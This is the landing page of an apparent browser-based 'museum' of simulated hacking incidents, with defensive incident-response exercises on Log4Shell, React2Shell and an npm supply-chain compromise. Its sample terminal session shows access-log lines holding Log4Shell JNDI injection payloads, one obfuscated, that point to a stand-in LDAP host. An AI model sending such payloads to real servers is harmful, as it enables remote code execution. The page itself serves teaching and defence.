036
Copy FailLatest
April 30, 2026. A kernel LPE that has lived in every major Linux distro since 2017 is now public, with a 732-byte exploit. You manage a multi-tenant Kubernetes cluster.
Category:Defensive / IRAdvancedTime:12 min
Now exhibiting/36 reconstructions
Replay hacker history in your browser.
A playable terminal museum for the hacks, incidents, and command-line moments that shaped computing. Every system is a simulation. You sit at the prompt the way the people who lived through it did, and type your way through.
EXH-020live session
responder@prod-java-trace:/srv/payments-api$ cat access.log | grep 'jndi'
2021-12-10 06:14:31 [WARN] Header: User-Agent:
${jndi:ldap://198.51.100.9:1389/a}
2021-12-10 06:14:44 [WARN] Header: X-Forwarded-For:
${jndi:ldap://198.51.100.9:1389/b}
2021-12-10 06:15:02 [WARN] Header: X-Api-Version:
${${lower:j}ndi:ldap://198.51.100.9:1389/c}
responder@prod-java-trace:/srv/payments-api$ grep -r 'log4j-core' pom.xml
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
responder@prod-java-trace:/srv/payments-api$ # CVE-2021-44228 — confirmed vulnerable
responder@prod-java-trace:/srv/payments-api$
Latest acquisitions
Three new exhibits.
The newest reconstructions in the archive. Open one to read the briefing first.
035
React2Shell
The morning of December 4th, 2025. A critical RSC vulnerability is on the front page. Your app is on Next 15.4. You have an hour before standup.
Category:Defensive / IRAdvancedTime:12 min
034
Two and a Half Hours
September 8, 2025. A single phishing email gives an attacker the npm account for `chalk`, `debug`, and sixteen other packages with 2.6 billion combined weekly downloads. The malicious versions sit live for two and a half hours.
Category:Modern / CloudIntermediateTime:11 min
How it works
A museum that you can type inside.
- 01step
Pick an exhibit
Each scenario is a self-contained reconstruction with a briefing, a fake system, and a defensive lesson.
- 02step
Type through the story
A real terminal renders in your browser via wterm. Commands are scripted; outputs feel real because they were written that way.
- 03step
Read the debrief
Every reconstruction ends with what happened, what was simulated, and what to take back to the systems you actually own.
Safety
No real systems are touched.
Every environment is fictional, sandboxed, or historically abstracted. Commands are matched against scripted responses. The filesystem you see exists only inside your tab. Network commands return a polite refusal. There are no real credentials, no real hosts, no exploit code: only the shape of the story, told in the medium it actually happened in.
EmulateHacks exists to teach how incidents look from the inside, so the next one is recognised earlier. Read the full safety note.